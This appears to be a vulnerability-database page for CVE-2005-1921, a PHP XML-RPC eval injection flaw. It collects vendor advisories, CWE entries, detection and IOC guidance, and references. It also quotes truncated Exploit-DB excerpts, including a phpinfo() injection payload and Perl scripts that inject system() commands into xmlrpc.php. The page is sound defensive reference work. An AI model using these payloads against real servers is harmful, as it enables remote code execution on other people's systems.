CVE-2005-1921
published 2005-07-05CVE-2005-1921: Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
79.07%
99.5th percentile
Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| drupal | drupal | < 4.5.4 | 4.5.4 |
| drupal | drupal | >= 4.6.0 < 4.6.2 | 4.6.2 |
| gggeek | phpxmlrpc | <= 1.1 | — |
| gggeek | phpxmlrpc | <= 1.1.1 | — |
| php | xml_rpc | <= 1.3.0 | — |
| tiki | tikiwiki_cms_groupware | < 1.8.5 | 1.8.5 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP POST requests to xmlrpc.php containing eval-injection payloads: look for single-quote escape sequences followed by PHP function calls (e.g., passthru, system, phpinfo) and comment terminators (//) in the POST body targeting the XML-RPC string parameter field. ↗
- →The exploit payload encodes the command as a chain of chr() calls joined by dots to bypass filtering; detect POST bodies to xmlrpc.php matching the pattern chr(\d+)\.chr(\d+) inside a passthru() or similar call. ↗
- →magic_quotes_gpc does not apply to $HTTP_RAW_POST_DATA, so single-quote injection in raw POST XML bodies is not sanitized; monitor for unescaped single quotes in XML-RPC POST data as an evasion indicator. ↗
- →Metasploit module php_xmlrpc_eval (unix/webapp/php_xmlrpc_eval) is the canonical exploit module; correlate IDS/WAF logs for this module name or its characteristic random-alphanumeric wrapper strings surrounding command output in HTTP responses. ↗
- →Detect the exploit check probe: HTTP POST to xmlrpc.php whose response body contains the literal string 'ownable', indicating active vulnerability scanning with the Metasploit module. ↗
- →Look for the sentinel strings '_begin_' and '_end_' in HTTP responses from xmlrpc.php, used by the dukenn exploit to delimit command output. ↗
- ·The vulnerability affects PEAR XML_RPC 1.3.0 and earlier AND PHPXMLRPC 1.1 and earlier; both libraries must be patched independently as they are separate codebases bundled into many applications (WordPress, Drupal, Serendipity, TikiWiki, etc.). ↗
- ·The payload space is limited to 512 bytes in the Metasploit module; longer payloads delivered via chr()-encoding chains may exceed this and fail silently. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mcp5-3g3r-5wm5: Eval injection vulnerability in PHPXMLRPC 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2005-2498 [HIGH] CWE-94 GHSA-mcp5-3g3r-5wm5: Eval injection vulnerability in PHPXMLRPC 1
Eval injection vulnerability in PHPXMLRPC 1.1.1 and earlier (PEAR XML-RPC for PHP), as used in multiple products including (1) Drupal, (2) phpAdsNew, (3) phpPgAds, and (4) phpgroupware, allows remote attackers to execute arbitrary PHP code via certain nested XML tags in a PHP document that should not be nested, which are injected into an eval function call, a different vulnerability than CVE-2005-1921.
GHSA
GHSA-7mjj-9265-43wm: Eval injection vulnerability in PEAR XML_RPC 1
ghsa_unreviewed·2022-05-01
CVE-2005-1921 [HIGH] CWE-94 GHSA-7mjj-9265-43wm: Eval injection vulnerability in PEAR XML_RPC 1
Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
Red Hat
security flaw
vendor_redhat·2005-08-14·CVSS 7.5
CVE-2005-2498 [HIGH] security flaw
security flaw
Eval injection vulnerability in PHPXMLRPC 1.1.1 and earlier (PEAR XML-RPC for PHP), as used in multiple products including (1) Drupal, (2) phpAdsNew, (3) phpPgAds, and (4) phpgroupware, allows remote attackers to execute arbitrary PHP code via certain nested XML tags in a PHP document that should not be nested, which are injected into an eval function call, a different vulnerability than CVE-2005-1921.
Ubuntu
PHP XMLRPC vulnerability
vendor_ubuntu·2005-07-05
CVE-2005-1921 PHP XMLRPC vulnerability
Title: PHP XMLRPC vulnerability
Summary: PHP XMLRPC vulnerability
A remote code execution vulnerability has been discovered in the XMLRPC module
of the PEAR (PHP Extension and Application Repository) extension of PHP. By
sending specially crafted XMLRPC requests to an affected web server, a remote
attacker could exploit this to execute arbitrary code with the web server's
privileges.
In Ubuntu 5.04 (Hoary Hedgehog), the PEAR extension is unsupported (it is
contained in the php4-universe package which is part of universe). However,
since this is a highly critical vulnerability, that package was fixed as well.
Please note that many applications contain a copy of the affected XMLRPC code,
which must be fixed separately. The following packages may also be affected,
but are unsupported in U
Red Hat
security flaw
vendor_redhat·2005-06-29·CVSS 7.5
CVE-2005-1921 [HIGH] security flaw
security flaw
Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
No detection rules found.
Exploit-DB
PHPXMLRPC < 1.1 - Remote Code Execution
exploitdb·2015-07-02·CVSS 7.5
CVE-2005-1921 [HIGH] PHPXMLRPC < 1.1 - Remote Code Execution
PHPXMLRPC addParam(' . $_xh[$parser]['params'][$i]. ");");
}
By creating an XML file that uses single quotes to escape into the eval() call an attacker can easily execute php code on the target server. This has a lot to do with the fact that magic_quotes_gpc() does not apply to $HTTP_RAW_POST_DATA so using single quotes is not a problem.
test.method
','')); phpinfo(); exit;/*
The above xml file when posted to the vulnerable server will cause the phpinfo() function call to be executed on the vulnerable server.
Solution:
An updated version of PHPXMLRPC can be downloaded from their official website, and all users are advised to upgrade immediately.
http://sourceforge.net/project/showfiles.php?group_id=34455&package_id=26601
A special thanks to Ed Dumbill, Giunta Gaetano, and all
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
exploitdb·2010-07-25
CVE-2005-1921 XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
---
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'Licens
Exploit-DB
PHP Net Tools 2.7.1 - Remote Code Execution
exploitdb·2006-04-18
CVE-2006-1921 PHP Net Tools 2.7.1 - Remote Code Execution
PHP Net Tools 2.7.1 - Remote Code Execution
---
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER ([email protected])
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools |
#Copyright (C) 2005 Eric Robertson |
#[email protected] |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
use LWP 5.64;
my $hostname = $ARGV[0];
my $dir = $ARGV[1];
my $command = $ARGV[2];
if (@ARGVnew;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
print "\n\n[+]Sending request to server . . .\r\n";
my $url = "http://$hostname$dir/nettools.php";
my $response = $browser->post( $url,[
'ping' => '1',
'host' => "
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)
exploitdb·2005-07-04
CVE-2005-1921 XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)
---
#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************
use LWP::UserAgent;
$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");
$host = $ARGV[0];
if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}
while ( $host )
{
print "xmlrpc\@\#";
$exec = ;
$data = "foo.bar1111','')); system('$exec'); die; /*";
$send =
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)
exploitdb·2005-07-04
CVE-2005-1921 XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)
---
#-------------------------------------------------------#
# /| #
# | | #
# | | #
# /\ ________| |___ #
# / \ \_______ __/ #
# / \|\_____ | | _ _ _ _ ()___ #
# / /\ \ ___ \ | | / | | | || \ || | | | #
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
# / ______ \ | || || | / | | | || \ || | | #
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
# \_/ |\_/ | || || | ___ _ _ #
# | | | || /| | | | | ||\/| #
# \| \||/ \| | |_ |_|| | #
# | | | || | #
# | |_ | || | #
# #
# Original advisory by http://gulftech.org/ #
# Exploit coded by dukenn (http://asteam.org) #
# #
#-------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection
exploitdb·2005-07-01
CVE-2005-2116 XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection
---
# tested and working /str0ke
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print
# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;
# general
my $host;
#informational lines to feed my own ego.
print
Metasploit
PHP XML-RPC Arbitrary Code Execution
metasploit
PHP XML-RPC Arbitrary Code Execution
PHP XML-RPC Arbitrary Code Execution
This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.
Bugzilla
CVE-2005-1921 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2005-1921 [HIGH] CVE-2005-1921 security flaw
CVE-2005-1921 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
Bugzilla
CVE-2005-2498 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2005-2498 [HIGH] CVE-2005-2498 security flaw
CVE-2005-2498 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Eval injection vulnerability in PHPXMLRPC 1.1.1 and earlier (PEAR XML-RPC for PHP), as used in multiple products including (1) Drupal, (2) phpAdsNew, (3) phpPgAds, and (4) phpgroupware, allows remote attackers to execute arbitrary PHP code via certain nested XML tags in a PHP document that should not be nested, which are injected into an eval function call, a different vulnerability than CVE-2005-1921.
CWE
Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
mitre_cwe
CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Implementation
Note: This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.
Common Consequences:
Scope: Confidentiality. Impact: Read Files or Directories, Read Application Data. The injected code could access restricted data / files.
Scope: Access Control. Impact:
CWE
Improper Control of Generation of Code ('Code Injection')
mitre_cwe
CWE-94 Improper Control of Generation of Code ('Code Injection')
CWE-94: Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism. In some cases, injectable code controls authentication; this may lead to a remote vulnerability.
Scope: Access Control. Impact: Gain Privileges or Assume Identity. Injected code can access resources that the attacker is directly prevented from ac
http://marc.info/?l=bugtraq&m=112008638320145&w=2http://marc.info/?l=bugtraq&m=112015336720867&w=2http://marc.info/?l=bugtraq&m=112605112027335&w=2http://pear.php.net/package/XML_RPC/download/1.3.1http://secunia.com/advisories/15810http://secunia.com/advisories/15852http://secunia.com/advisories/15855http://secunia.com/advisories/15861http://secunia.com/advisories/15872http://secunia.com/advisories/15883http://secunia.com/advisories/15884http://secunia.com/advisories/15895http://secunia.com/advisories/15903http://secunia.com/advisories/15904http://secunia.com/advisories/15916http://secunia.com/advisories/15917http://secunia.com/advisories/15922http://secunia.com/advisories/15944http://secunia.com/advisories/15947http://secunia.com/advisories/15957http://secunia.com/advisories/16001http://secunia.com/advisories/16339http://secunia.com/advisories/16693http://secunia.com/advisories/17440http://secunia.com/advisories/17674http://secunia.com/advisories/18003http://security.gentoo.org/glsa/glsa-200507-01.xmlhttp://security.gentoo.org/glsa/glsa-200507-06.xmlhttp://security.gentoo.org/glsa/glsa-200507-07.xmlhttp://securitytracker.com/id?1015336http://sourceforge.net/project/showfiles.php?group_id=87163http://sourceforge.net/project/shownotes.php?release_id=338803http://www.ampache.org/announce/3_3_1_2.phphttp://www.debian.org/security/2005/dsa-745http://www.debian.org/security/2005/dsa-746http://www.debian.org/security/2005/dsa-747http://www.debian.org/security/2005/dsa-789http://www.drupal.org/security/drupal-sa-2005-003/advisory.txthttp://www.gulftech.org/?node=research&article_id=00087-07012005http://www.hardened-php.net/advisory-022005.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2005:109http://www.novell.com/linux/security/advisories/2005_18_sr.htmlhttp://www.novell.com/linux/security/advisories/2005_41_php_pear.htmlhttp://www.novell.com/linux/security/advisories/2005_49_php.htmlhttp://www.redhat.com/support/errata/RHSA-2005-564.htmlhttp://www.securityfocus.com/archive/1/419064/100/0/threadedhttp://www.securityfocus.com/bid/14088http://www.vupen.com/english/advisories/2005/2827https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11294https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A350http://marc.info/?l=bugtraq&m=112008638320145&w=2http://marc.info/?l=bugtraq&m=112015336720867&w=2http://marc.info/?l=bugtraq&m=112605112027335&w=2http://pear.php.net/package/XML_RPC/download/1.3.1http://secunia.com/advisories/15810http://secunia.com/advisories/15852http://secunia.com/advisories/15855http://secunia.com/advisories/15861http://secunia.com/advisories/15872http://secunia.com/advisories/15883http://secunia.com/advisories/15884http://secunia.com/advisories/15895http://secunia.com/advisories/15903http://secunia.com/advisories/15904http://secunia.com/advisories/15916http://secunia.com/advisories/15917http://secunia.com/advisories/15922http://secunia.com/advisories/15944http://secunia.com/advisories/15947http://secunia.com/advisories/15957http://secunia.com/advisories/16001http://secunia.com/advisories/16339http://secunia.com/advisories/16693http://secunia.com/advisories/17440http://secunia.com/advisories/17674http://secunia.com/advisories/18003http://security.gentoo.org/glsa/glsa-200507-01.xmlhttp://security.gentoo.org/glsa/glsa-200507-06.xmlhttp://security.gentoo.org/glsa/glsa-200507-07.xmlhttp://securitytracker.com/id?1015336http://sourceforge.net/project/showfiles.php?group_id=87163http://sourceforge.net/project/shownotes.php?release_id=338803http://www.ampache.org/announce/3_3_1_2.phphttp://www.debian.org/security/2005/dsa-745http://www.debian.org/security/2005/dsa-746http://www.debian.org/security/2005/dsa-747http://www.debian.org/security/2005/dsa-789http://www.drupal.org/security/drupal-sa-2005-003/advisory.txthttp://www.gulftech.org/?node=research&article_id=00087-07012005http://www.hardened-php.net/advisory-022005.phphttp://www.mandriva.com/security/advisories?name=MDKSA-2005:109http://www.novell.com/linux/security/advisories/2005_18_sr.htmlhttp://www.novell.com/linux/security/advisories/2005_41_php_pear.htmlhttp://www.novell.com/linux/security/advisories/2005_49_php.htmlhttp://www.redhat.com/support/errata/RHSA-2005-564.htmlhttp://www.securityfocus.com/archive/1/419064/100/0/threadedhttp://www.securityfocus.com/bid/14088http://www.vupen.com/english/advisories/2005/2827https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11294https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A350
2005-07-05
Published